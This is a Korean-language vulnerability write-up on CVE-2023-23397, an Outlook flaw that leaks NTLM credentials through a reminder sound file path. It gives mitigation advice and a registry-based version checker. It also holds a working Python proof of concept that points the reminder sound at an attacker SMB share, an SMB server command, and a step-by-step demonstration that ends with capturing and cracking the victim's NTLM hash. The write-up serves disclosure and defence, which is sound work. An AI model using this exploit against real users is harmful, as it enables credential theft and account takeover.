취약점 분석 - CVE-2023-23397

CVE-2023-23397 취약점 정보

• CVE-2023-23397는 Microsoft Windows 전용 Outlook에 약속을 알려주는 ‘미리 알림’ 기능에 재생할 사운드 파일을 불러오기 위해서 공격자의 SMB 서버로 인증하는 과정에 NTLM 자격 증명을 탈취되는 권한 상승 취약점입니다.
• 해당 취약점을 이용하여 권한 상승이 이루어져 더 큰 피해가 발생할 수 있을 정도로 위험도는 다소 높을 것으로 예상됩니다.
• 조치 방안으로 Outlook을 Build 16130.20306 이상으로 업데이트가 필요하며, SMB 서비스를 이용하지 않을 경우에는 해당 서비스를 비활성화 하거나 SMB TCP/445 포트 아웃바운드를 차단합니다.

CVE Number CVE-2023-23397

CVSS Score	9.8
severity(심각도)	CRITICAL
사용된 패턴	appointment.PidLidReminderFileParameter = @"\\공격자주소\share\sound.wav”;

# pip install independentsoft.msg
# usage: python3 CVE-2023-23397.py --path \\\\attacker_ip\\share

from independentsoft.msg import Message
import datetime, argparse

parser = argparse.ArgumentParser(description="CVE-2023-23397")
parser.add_argument("--path", '-p', help="Path to save the file", required=True)
args = parser.parse_args()

if __name__ == "__main__":
    appointment = Message()
    appointment.message_class = "IPM.Appointment"
    appointment.subject = "CVE-2023-23397"
    appointment.body = "CVE-2023-23397 Test"
    appointment.location = "Security Lab"
    appointment.appointment_start_time = datetime.datetime.now()
    appointment.appointment_end_time = datetime.datetime.now()
    appointment.reminder_override_default = True
    appointment.reminder_sound_file = args.path
    appointment.save("appointment.msg")

smbserver.py -smb2support SHARE .

공격 시연

 

1. 상단에 “새 전자 메일” > “약속” 선택

 

2. 상단에 미리 알림 0분 선택

 

3. 선택 창 하단에 “소리…” 클릭

 

 

4. 공격자 공유 폴더 주소 입력 후 “확인” 클릭

 

5. 상단에 “전달” 클릭

 

 

6. 받는 사람에 공격 대상의 이메일 주소 입력 후 보내기 버튼 클릭

 

 

7. 공격 대상 측에서 수신 받은 일정을 내 달력에 추가

 

 

8. 추가 시 알림 기능 작동

 

 

9. 공격자의 파일 공유 서버에는 피해자의 NTLM 해시가 기록됨

 

10. 패스워드 크래킹 도구를 사용해 사용자의 패스워드를 획득

 

 

# using python CVE-2023-23397_check.py

import winreg

# 레지스트리 키 열기
hkey = winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, "SOFTWARE\\\\Microsoft\\\\Office\\\\ClickToRun\\\\Configuration")

# VersionToReport 값 읽기
try:
    value, type = winreg.QueryValueEx(hkey, "VersionToReport")
except FileNotFoundError:
    print("Microsoft Office를 찾을 수 없습니다.")
except Exception as e:
    print(f"레지스트리 읽기 오류: {e}")
else:
    # 값 출력
    if type == winreg.REG_SZ:
        print(f"현재 빌드 버전 : {value}")

        build_version = float( '.'.join(value.split('.')[2:]) )

        if build_version < 16130.20306:
            print("[취약] Office 버전이 16130.20306 미만입니다.")
        else:
            print("[양호] Office 버전이 16130.20306 이상입니다.")

# 레지스트리 키 닫기
winreg.CloseKey(hkey)

참고

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-23397

https://learn.microsoft.com/en-us/officeupdates/microsoft365-apps-security-updates

https://asec.ahnlab.com/ko/49819/